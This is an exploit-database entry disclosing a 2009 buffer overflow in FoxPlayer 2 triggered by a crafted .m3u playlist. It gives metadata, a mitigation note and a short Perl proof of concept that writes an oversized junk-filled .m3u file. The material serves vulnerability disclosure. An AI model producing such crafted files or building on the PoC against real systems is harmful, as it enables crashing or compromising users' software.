header-logo
Suggest Exploit
vendor:
FoxPlayer
by:
MadjiX
7,8
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: FoxPlayer
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:foxmediatools:foxplayer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

FoxPlayer 2 (.m3u) Local BOF PoC

FoxPlayer 2 is vulnerable to a buffer overflow when a specially crafted .m3u file is opened. This can be exploited to execute arbitrary code by tricking a user into opening a malicious .m3u file.

Mitigation:

Update to the latest version of FoxPlayer 2.
Source

Exploit-DB raw data:

###########################################################################
#Exploit Title : FoxPlayer 2 (.m3u) Local BOF PoC
#download : http://www.foxmediatools.com/products/foxplayer.html
#tested on windows xp SP 3 FR
#Author: MadjiX - Dz8[at]hotmail[dot]com
#Special Greets: Bibi-info , His0k4
###########################################################################
my $file= "MadjiX.m3u";
my $junk1= "\x41" x 100000 ;
open($FILE,">$file");
print $FILE $junk1 ;
close($FILE);